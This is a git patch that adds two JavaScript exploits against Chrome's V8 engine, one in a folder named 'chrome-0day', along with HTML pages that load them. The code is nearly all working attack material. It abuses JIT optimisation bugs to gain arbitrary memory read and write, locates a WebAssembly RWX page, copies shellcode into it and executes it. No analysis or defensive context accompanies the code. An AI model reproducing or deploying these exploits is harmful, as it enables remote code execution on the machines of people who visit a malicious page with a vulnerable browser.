From b69bbe527fcbaa9623f19408e176f55b37b2efdd Mon Sep 17 00:00:00 2001
From: helloexp <21156949+helloexp@users.noreply.github.com>
Date: Thu, 13 Jan 2022 17:58:32 +0800
Subject: [PATCH] add chrome exp

---
 15-chrome/chrome-0day/exploit.html            |   1 +
 15-chrome/chrome-0day/exploit.js              | 122 +++++++++++++
 15-chrome/chrome-exploit/convert_shellcode.js |   1 +
 15-chrome/chrome-exploit/exploit.html         |   1 +
 15-chrome/chrome-exploit/exploit.js           | 161 ++++++++++++++++++
 5 files changed, 286 insertions(+)
 create mode 100644 15-chrome/chrome-0day/exploit.html
 create mode 100644 15-chrome/chrome-0day/exploit.js
 create mode 100644 15-chrome/chrome-exploit/convert_shellcode.js
 create mode 100644 15-chrome/chrome-exploit/exploit.html
 create mode 100644 15-chrome/chrome-exploit/exploit.js

diff --git a/15-chrome/chrome-0day/exploit.html b/15-chrome/chrome-0day/exploit.html
new file mode 100644
index 0000000..94aa132
--- /dev/null
+++ b/15-chrome/chrome-0day/exploit.html
@@ -0,0 +1 @@
+<script src="exploit.js"></script>
diff --git a/15-chrome/chrome-0day/exploit.js b/15-chrome/chrome-0day/exploit.js
new file mode 100644
index 0000000..e5eb140
--- /dev/null
+++ b/15-chrome/chrome-0day/exploit.js
@@ -0,0 +1,122 @@
+/*
+/*
+BSD 2-Clause License
+Copyright (c) 2021, rajvardhan agarwal
+All rights reserved.
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+1. Redistributions of source code must retain the above copyright notice, this
+   list of conditions and the following disclaimer.
+2. Redistributions in binary form must reproduce the above copyright notice,
+   this list of conditions and the following disclaimer in the documentation
+   and/or other materials provided with the distribution.
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+
+var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
+var wasm_mod = new WebAssembly.Module(wasm_code);
+var wasm_instance = new WebAssembly.Instance(wasm_mod);
+var f = wasm_instance.exports.main;
+
+var buf = new ArrayBuffer(8);
+var f64_buf = new Float64Array(buf);
+var u64_buf = new Uint32Array(buf);
+let buf2 = new ArrayBuffer(0x150);
+
+function ftoi(val) {
+    f64_buf[0] = val;
+    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
+}
+
+function itof(val) {
+    u64_buf[0] = Number(val & 0xffffffffn);
+    u64_buf[1] = Number(val >> 32n);
+    return f64_buf[0];
+}
+
+const _arr = new Uint32Array([2**31]);
+
+function foo(a) {
+    var x = 1;
+	x = (_arr[0] ^ 0) + 1;
+
+	x = Math.abs(x);
+	x -= 2147483647;
+	x = Math.max(x, 0);
+
+	x -= 1;
+	if(x==-1) x = 0;
+
+	var arr = new Array(x);
+	arr.shift();
+	var cor = [1.1, 1.2, 1.3];
+
+	return [arr, cor];
+}
+
+for(var i=0;i<0x3000;++i)
+    foo(true);
+
+var x = foo(false);
+var arr = x[0];
+var cor = x[1];
+
+const idx = 6;
+arr[idx+10] = 0x4242;
+
+function addrof(k) {
+    arr[idx+1] = k;
+    return ftoi(cor[0]) & 0xffffffffn;
+}
+
+function fakeobj(k) {
+    cor[0] = itof(k);
+    return arr[idx+1];
+}
+
+var float_array_map = ftoi(cor[3]);
+
+var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
+var fake = fakeobj(addrof(arr2) + 0x20n);
+
+function arbread(addr) {
+    if (addr % 2n == 0) {
+        addr += 1n;
+    }
+    arr2[1] = itof((2n << 32n) + addr - 8n);
+    return (fake[0]);
+}
+
+function arbwrite(addr, val) {
+    if (addr % 2n == 0) {
+        addr += 1n;
+    }
+    arr2[1] = itof((2n << 32n) + addr - 8n);
+    fake[0] = itof(BigInt(val));
+}
+
+function copy_shellcode(addr, shellcode) {
+    let dataview = new DataView(buf2);
+    let buf_addr = addrof(buf2);
+    let backing_store_addr = buf_addr + 0x14n;
+    arbwrite(backing_store_addr, addr);
+
+    for (let i = 0; i < shellcode.length; i++) {
+        dataview.setUint32(4*i, shellcode[i], true);
+    }
+}
+
+var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
+console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
+var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
+copy_shellcode(rwx_page_addr, shellcode);
+f();
diff --git a/15-chrome/chrome-exploit/convert_shellcode.js b/15-chrome/chrome-exploit/convert_shellcode.js
new file mode 100644
index 0000000..08dc626
--- /dev/null
+++ b/15-chrome/chrome-exploit/convert_shellcode.js
@@ -0,0 +1 @@
+../CVE-2020-16040/convert_shellcode.js
\ No newline at end of file
diff --git a/15-chrome/chrome-exploit/exploit.html b/15-chrome/chrome-exploit/exploit.html
new file mode 100644
index 0000000..94aa132
--- /dev/null
+++ b/15-chrome/chrome-exploit/exploit.html
@@ -0,0 +1 @@
+<script src="exploit.js"></script>
diff --git a/15-chrome/chrome-exploit/exploit.js b/15-chrome/chrome-exploit/exploit.js
new file mode 100644
index 0000000..c14d499
--- /dev/null
+++ b/15-chrome/chrome-exploit/exploit.js
@@ -0,0 +1,161 @@
+/*
+BSD 2-Clause License
+
+Copyright (c) 2021, rajvardhan agarwal
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice, this
+   list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright notice,
+   this list of conditions and the following disclaimer in the documentation
+   and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+
+var buf = new ArrayBuffer(8);
+var f64_buf = new Float64Array(buf);
+var u64_buf = new Uint32Array(buf);
+
+var arraybuf = new ArrayBuffer(0x13373);
+var wasm_code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108, 0, 0, 10, 4, 1, 2, 0, 11]);
+var mod = new WebAssembly.Module(wasm_code);
+var wasm_instance = new WebAssembly.Instance(mod);
+var shell = wasm_instance.exports.shell;
+var obj_array = [1337331,1337332,1337333,1337334,wasm_instance,wasm_instance,1337336,1337337];
+
+var shellcode = new Uint8Array([72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 46, 99, 104, 111, 46, 114, 105, 1, 72, 49, 4, 36, 72, 137, 231, 104, 59, 49, 1, 1, 129, 52, 36, 1, 1, 1, 1, 72, 184, 68, 73, 83, 80, 76, 65, 89, 61, 80, 49, 210, 82, 106, 8, 90, 72, 1, 226, 82, 72, 137, 226, 106, 99, 72, 184, 98, 105, 110, 47, 120, 99, 97, 108, 80, 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 44, 98, 1, 46, 116, 114, 115, 46, 72, 49, 4, 36, 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 46, 99, 104, 111, 46, 114, 105, 1, 72, 49, 4, 36, 49, 246, 86, 106, 19, 94, 72, 1, 230, 86, 106, 24, 94, 72, 1, 230, 86, 106, 24, 94, 72, 1, 230, 86, 72, 137, 230, 106, 59, 88, 15, 5, 0]);
+
+function ftoi(val) {
+         f64_buf[0] = val;
+         return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
+}
+function itof(val) {
+         u64_buf[0] = Number(val & 0xffffffffn);
+         u64_buf[1] = Number(val >> 32n);
+         return f64_buf[0];
+}
+
+array = Array(0x40000).fill(1.1);
+args = Array(0x100 - 1).fill(array);
+args.push(Array(0x40000 - 4).fill(2.2));
+giant_array = Array.prototype.concat.apply([], args);
+giant_array.splice(giant_array.length, 0, 3.3, 3.3, 3.3);
+
+length_as_double =
+    new Float64Array(new BigUint64Array([0x2424242400000001n]).buffer)[0];
+
+function trigger(array) {
+  var x = array.length;
+  x -= 67108861;
+  x = Math.max(x, 0);
+  x *= 6;
+  x -= 5;
+  x = Math.max(x, 0);
+
+  let corrupting_array = [0.1, 0.1];
+  let corrupted_array = [0.1];
+
+  corrupting_array[x] = length_as_double;
+  return [corrupting_array, corrupted_array];
+}
+
+for (let i = 0; i < 30000; ++i) {
+  trigger(giant_array);
+}
+
+corrupted_array = trigger(giant_array)[1];
+
+var search_space = [[(0x8040000-8)/8, 0x805b000/8], [(0x805b000)/8, (0x83c1000/8)-1], [0x8400000/8, (0x8701000/8)-1], [0x8740000/8, (0x8ac1000/8)-1], [0x8b00000/8, (0x9101000/8)-1]];
+function searchmem(value)
+{
+	skip = 0;
+	for(i=0; i<search_space.length; ++i)
+	{
+		for(j=search_space[i][0];j<search_space[i][1];++j)
+		{
+			if(((ftoi(corrupted_array[j])) >> 32n) === value || (((ftoi(corrupted_array[j])) & 0xffffffffn) === value))
+			{
+				if(skip++ == 2) // Probably the first two are due to the search itself
+					return j;
+			}
+		}
+	}
+	return -1;
+}
+
+function searchmem_full(value)
+{
+	for(i=0;i<search_space.length;++i)
+	{
+		for(j=search_space[i][0];j<search_space[i][1];++j)
+		{
+			if((ftoi(corrupted_array[j]) === value))
+			{
+				if((((ftoi(corrupted_array[j+2]) >> 56n) & 0xffn) == 8n) && (((ftoi(corrupted_array[j+2]) >> 24n) & 0xffn) == 8n))
+				{
+					return j;
+				}
+			}
+		}
+	}
+	return -1;
+}
+
+var arraybuf_idx = searchmem(0x13373n);
+if(arraybuf_idx == -1)
+{
+	alert('Failed 1');
+	throw new Error("Not found");
+}
+document.write("Found arraybuf at idx: " + arraybuf_idx + "<br>");
+function arb_read(addr, length)
+{
+	var data = [];
+	let u8_arraybuf = new Uint8Array(arraybuf);
+	corrupted_array[arraybuf_idx+1] = itof(addr);
+	for(i=0;i<length;++i)
+		data.push(u8_arraybuf[i]);
+	return data;
+}
+
+function arb_write(addr, data)
+{
+	corrupted_array[arraybuf_idx+1] = itof(addr);
+	let u8_arraybuf = new Uint8Array(arraybuf);
+	for(i=0;i<data.length;++i)
+		u8_arraybuf[i] = data[i];
+}
+
+idx = searchmem_full((1337332n << 33n) + (1337331n << 1n));
+if (idx == -1)
+{
+	alert('Failed 2');
+	throw new Error("Not found");
+}
+
+wasm_addr = ftoi(corrupted_array[idx+2]) & 0xffffffffn;
+document.write("Wasm instance: 0x"+wasm_addr.toString(16) + "<br>");
+rwx_idx = Number((wasm_addr-1n+0x68n)/8n);
+rwx_addr = ftoi(corrupted_array[rwx_idx-1]);
+if ((wasm_addr & 0xfn) == 5n || (wasm_addr & 0xfn) == 0xdn)
+{
+	rwx_addr >>= 32n;
+	rwx_addr += (ftoi(corrupted_array[rwx_idx]) & 0xffffffffn) << 32n;
+}
+document.write("rwx addr: 0x"+rwx_addr.toString(16));
+arb_write(rwx_addr, shellcode);
+shell();